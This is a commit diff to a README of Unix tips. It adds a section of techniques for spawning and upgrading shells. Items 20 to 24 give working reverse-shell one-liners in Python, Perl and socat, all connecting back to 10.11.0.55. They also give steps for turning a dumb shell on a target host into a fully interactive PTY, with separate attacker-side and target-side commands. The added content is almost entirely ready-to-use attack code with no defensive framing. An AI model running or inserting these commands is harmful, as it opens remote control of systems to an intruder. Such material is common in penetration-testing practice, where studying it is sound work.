Add some techniques to spawn or upgrade shells

README.md

@@ -253,8 +253,56 @@ Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from our system (cou
 # tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done
 ```
 
+**20. Spawn a reverse shell with Python**
+
+```
+$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.55",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+```
+
+**21. Spawn a reverse shell with Perl**
+
+```
+# method 1
+$ perl -e 'use Socket;$i="10.11.0.55";$p=4445;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+# method 2
+$ perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.11.0.55:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
+```
+
+**22. Upgrade a dumb shell to a pty shell**
+
+```
+# python
+python -c 'import pty; pty.spawn("/bin/bash")'
+# perl
+perl -e 'exec "/bin/bash";'
+# awk
+awk 'BEGIN {system("/bin/bash")}'
+```
+
+**23. Upgrade a dumb shell to a fully interactive shell with Python and stty**
+
+```
+# on target host
+$ python -c 'import pty; pty.spawn("/bin/bash")'
+Ctrl-Z
+# on attacker's host
+$ stty raw -echo
+$ fg
+$ reset
+# on target host
+$ export SHELL=bash
+$ export TERM=xterm-256color
+$ stty rows 43 columns 132
+```
+
+**24. Spawn a fully interactive reverse shell with socat**
+
+```
+# on attacker's host (listener)
+socat file:`tty`,raw,echo=0 tcp-listen:4444
+# on target host (reverse shell)
+socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.11.0.55:4444
+```
 
 --------------------------------------------------------------------------
 Shoutz: ADM
-
-